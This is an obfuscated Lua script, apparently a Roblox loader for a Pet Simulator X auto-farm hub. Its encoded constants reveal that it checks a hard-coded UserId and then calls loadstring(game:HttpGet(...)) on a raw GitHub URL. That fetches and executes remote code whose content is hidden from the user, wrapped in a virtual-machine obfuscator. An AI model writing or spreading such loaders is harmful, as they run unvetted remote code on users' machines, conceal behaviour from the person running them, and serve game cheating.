--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v83=(v31/((5 -3)^(v32-(2 -1))))%(2^(((v33-1) -(v32-(1 -0))) + (2 -1))) ;return v83-(v83%(620 -(555 + 64))) ;else local v84=(933 -(857 + 74))^(v32-((90 + 479) -(367 + 201))) ;return (((v31%(v84 + v84))>=v84) and (928 -(214 + 713))) or (0 + (877 -(282 + 595))) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=(1605 + 32) -(1523 + 114) ;local v35;local v36;local v37;local v38;while true do if (v34==(0 + 0)) then v35,v36,v37,v38=v1(v16,v19,v19 + (3 -0) );v19=v19 + (1069 -(68 + 997)) ;v34=1271 -(226 + 1044) ;end if (v34==(1 + 0)) then return (v38 * 16777216) + (v37 * (285370 -219834)) + (v36 * ((1330 -(892 + 65)) -(32 + 85))) + v35 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=1787 -(995 + 792) ;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v39~=0) then else local v91=763 -(82 + 681) ;while true do if (v91==(0 -0)) then v40=0;v41=nil;v91=1710 -(71 + 1638) ;end if (v91==1) then v39=1;break;end end end if (v39~=1) then else v42=nil;v43=nil;v39=4 -2 ;end if ((1 + 2)~=v39) then else v46=nil;while true do if (v40~=0) then else local v98=0;local v99;while true do if (v98==(0 -0)) then v99=0;while true do if (v99~=(0 + 0)) then else v41={};v42={};v99=1;end if (1==v99) then v43={};v44={v41,v42,nil,v43};v99=2 + 0 ;end if (v99~=2) then else v40=1131 -(87 + 1043) ;break;end end break;end end end if (v40~=1) then else v45=v24();v46={};for v101=1,v45 do local v102=448 -(10 + 438) ;local v103;local v104;local v105;local v106;while true do if ((0 + 0)~=v102) then else v103=0;v104=nil;v102=1;end if (v102~=1) then else v105=nil;v106=nil;v102=7 -5 ;end if (v102==(2 + 0)) then while true do if (v103~=(1181 -(1123 + 57))) then else v106=nil;while true do if (v104~=(1 + 0)) then else if (v105==(255 -(163 + 91))) then v106=v22()~=0 ;elseif (v105==2) then v106=v25();elseif (v105==3) then v106=v26();end v46[v101]=v106;break;end if (v104==(1930 -(1869 + 61))) then local v171=0;while true do if ((0 + 0)~=v171) then else v105=v22();v106=nil;v171=1;end if (v171==(3 -2)) then v104=1 -0 ;break;end end end end break;end if (v103~=(0 + 0)) then else v104=0;v105=nil;v103=1 -0 ;end end break;end end end v44[3 + 0 ]=v22();v40=2;end if (v40==(1476 -(1329 + 145))) then for v107=972 -(140 + 831) ,v24() do local v108=1850 -(1409 + 441) ;local v109;local v110;local v111;while true do if (v108==(719 -(15 + 703))) then v111=nil;while true do if (v109~=1) then else while true do if (v110==(0 + 0)) then v111=v22();if (v21(v111,439 -(262 + 176) ,1722 -(345 + 1376) )==(688 -(198 + 490))) then local v174=0 -0 ;local v175;local v176;local v177;local v178;local v179;while true do if (v174==1) then v177=nil;v178=nil;v174=2;end if (v174~=(0 -0)) then else v175=1206 -(696 + 510) ;v176=nil;v174=1 -0 ;end if (v174==(1264 -(1091 + 171))) then v179=nil;while true do if (v175~=(1 + 0)) then else v178=nil;v179=nil;v175=2;end if (v175~=(0 -0)) then else local v182=0 -0 ;while true do if (v182==(375 -(123 + 251))) then v175=4 -3 ;break;end if (v182==(698 -(208 + 490))) then v176=0;v177=nil;v182=1;end end end if (v175~=2) then else while true do if (0~=v176) then else v177=v21(v111,2,1 + 2 );v178=v21(v111,2 + 2 ,842 -(660 + 176) );v176=1;end if (2==v176) then local v183=0 + 0 ;while true do if (v183==0) then if (v21(v178,1,203 -(14 + 188) )==(676 -(534 + 141))) then v179[1 + 1 ]=v46[v179[2]];end if (v21(v178,2 + 0 ,2)==1) then v179[3 + 0 ]=v46[v179[6 -3 ]];end v183=1;end if ((1 -0)~=v183) then else v176=8 -5 ;break;end end end if (v176==(2 + 1)) then if (v21(v178,2 + 1 ,399 -(115 + 281) )~=(2 -1)) then else v179[4 + 0 ]=v46[v179[4]];end v41[v107]=v179;break;end if (v176~=1) then else local v185=0 -0 ;local v186;while true do if (v185~=(0 -0)) then else v186=867 -(550 + 317) ;while true do if (v186~=(1 -0)) then else v176=2;break;end if (v186~=0) then else v179={v23(),v23(),nil,nil};if (v177==(0 -0)) then local v193=285 -(134 + 151) ;local v194;local v195;while true do if ((1665 -(970 + 695))==v193) then v194=0 -0 ;v195=nil;v193=1;end if (v193==1) then while true do if (v194~=0) then else v195=0;while true do if (v195==0) then v179[1993 -(582 + 1408) ]=v23();v179[13 -9 ]=v23();break;end end break;end end break;end end elseif (v177==1) then v179[3]=v24();elseif (v177==(2 -0)) then v179[3]=v24() -(2^16) ;elseif (v177~=(11 -8)) then else local v198=1824 -(1195 + 629) ;local v199;while true do if (v198~=(0 -0)) then else v199=241 -(187 + 54) ;while true do if ((780 -(162 + 618))~=v199) then else v179[3 + 0 ]=v24() -(2^16) ;v179[4]=v23();break;end end break;end end end v186=1 + 0 ;end end break;end end end end break;end end break;end end end break;end end break;end if (v109~=0) then else local v158=0 -0 ;while true do if (v158==0) then v110=0 -0 ;v111=nil;v158=1;end if (v158~=(1 + 0)) then else v109=1;break;end end end end break;end if (v108==(1636 -(1373 + 263))) then local v114=0;while true do if (v114==1) then v108=1;break;end if (v114~=0) then else v109=0;v110=nil;v114=1001 -(451 + 549) ;end end end end end for v112=1 + 0 ,v24() do v42[v112-1 ]=v29();end return v44;end end break;end if ((2 -0)~=v39) then else local v92=0;while true do if (v92==(0 -0)) then v44=nil;v45=nil;v92=1;end if ((1385 -(746 + 638))==v92) then v39=3;break;end end end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=v24();local v48=v24();local v49=1 + 0 ;local v50=(v21(v48,1 -0 ,361 -(218 + 123) ) * ((1583 -(1535 + 46))^(2 + 30))) + v47 ;local v51=v21(v48,21,31);local v52=((v21(v48,1056 -(706 + 318) )==(1 + 0)) and  -(1272 -(945 + 326))) or (1 + 0 + 0) ;if (v51==(560 -(306 + 254))) then if (v50==(0 + 0 + 0 + 0)) then return v52 * (0 -0) ;else v51=701 -(271 + 429) ;v49=1467 -(899 + 568) ;end elseif (v51==(1346 + 701)) then return ((v50==((1322 -(1249 + 73)) -0)) and (v52 * ((604 -(268 + 120 + 215))/(290 -(60 + (759 -(406 + 123))))))) or (v52 * NaN) ;end return v8(v52,v51-(54 + 969) ) * (v49 + (v50/((574 -(426 + 146))^(7 + 45)))) ;end v26=nil;function v26(v53)local v54;if  not v53 then local v85=0 + 0 ;while true do if ((0 -0)==v85) then v53=v24();if (v53==(0 -0)) then return "";end break;end end end v54=v3(v16,v19,(v19 + v53) -(1901 -(106 + (5296 -3502))) );v19=v19 + v53 ;local v55={};for v67=(2 -1) + 0 , #v54 do v55[v67]=v2(v1(v3(v54,v67,v67)));end return v6(v55);end v18=5;end if (v18==2) then function v22()local v56=v1(v16,v19,v19);v19=v19 + 1 ;return v56;end v23=nil;function v23()local v57=114 -(4 + 110) ;local v58;local v59;while true do if (v57==(1 -0)) then return (v59 * (840 -(57 + 429 + 98))) + v58 ;end if (v57==(1427 -(41 + 1386))) then v58,v59=v1(v16,v19,v19 + (2 -0) );v19=v19 + (105 -(17 + 86)) ;v57=3 -2 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v60)if (v1(v60,2)==79) then local v86=0;while true do if (v86==0) then v20=v0(v3(v60,1,1));return "";end end else local v87=v2(v0(v60,16));if v20 then local v93=v5(v87,v20);v20=nil;return v93;else return v87;end end end);v18=1;end if (v18==7) then function v30(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v28;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v88=0,v77 do if (v88>=v71) then v75[v88-v71 ]=v76[v88 + 1 ];else v79[v88]=v76[v88 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=11) then if (v82<=5) then if (v82<=2) then if (v82<=0) then v73=v81[3];elseif (v82>1) then for v159=v81[2],v81[3] do v79[v159]=nil;end else v63[v81[3]]=v79[v81[2]];end elseif (v82<=3) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v82>4) then v79[v81[2]]();else v79[v81[2]]=v81[3]~=0 ;end elseif (v82<=8) then if (v82<=6) then v79[v81[2]]();elseif (v82>7) then local v137=0;local v138;while true do if (0==v137) then v138=v81[2];v79[v138]=v79[v138](v13(v79,v138 + 1 ,v74));break;end end else do return;end end elseif (v82<=9) then local v116=v81[2];v79[v116]=v79[v116](v13(v79,v116 + 1 ,v74));elseif (v82==10) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end else v79[v81[2]]=v81[3];end elseif (v82<=17) then if (v82<=14) then if (v82<=12) then local v118=v81[2];local v119,v120=v72(v79[v118](v13(v79,v118 + 1 ,v81[3])));v74=(v120 + v118) -1 ;local v121=0;for v128=v118,v74 do v121=v121 + 1 ;v79[v128]=v119[v121];end elseif (v82>13) then v79[v81[2]]=v81[3]~=0 ;else do return;end end elseif (v82<=15) then v73=v81[3];elseif (v82>16) then local v142=0;local v143;local v144;local v145;local v146;while true do if (v142==2) then for v172=v143,v74 do local v173=0;while true do if (v173==0) then v146=v146 + 1 ;v79[v172]=v144[v146];break;end end end break;end if (v142==1) then v74=(v145 + v143) -1 ;v146=0;v142=2;end if (v142==0) then v143=v81[2];v144,v145=v72(v79[v143](v13(v79,v143 + 1 ,v81[3])));v142=1;end end else v63[v81[3]]=v79[v81[2]];end elseif (v82<=20) then if (v82<=18) then for v131=v81[2],v81[3] do v79[v131]=nil;end elseif (v82==19) then local v149=0;local v150;local v151;while true do if (v149==1) then v79[v150 + 1 ]=v151;v79[v150]=v151[v81[4]];break;end if (v149==0) then v150=v81[2];v151=v79[v81[3]];v149=1;end end else v79[v81[2]]=v63[v81[3]];end elseif (v82<=21) then local v123=v81[2];local v124=v79[v81[3]];v79[v123 + 1 ]=v124;v79[v123]=v124[v81[4]];elseif (v82>22) then v79[v81[2]]=v81[3];else v79[v81[2]]=v63[v81[3]];end v73=v73 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!073O00028O0003063O0055736572496403093O002O3938323530372O31030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574035B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F53637269707468756270657473696D782F70657473696D786C61756E636865722F6D61696E2F426F7265646875626661726D6775692E6C756100163O0012173O00014O0012000100013O0026033O00020001000100040F3O00020001001217000100013O002603000100050001000100040F3O00050001001217000200033O001201000200023O001214000200043O001214000300053O002015000300030006001217000500074O000E000600014O0011000300064O000900023O00022O000600020001000100040F3O0015000100040F3O0005000100040F3O0015000100040F3O000200012O00073O00017O00",v9(),...);end
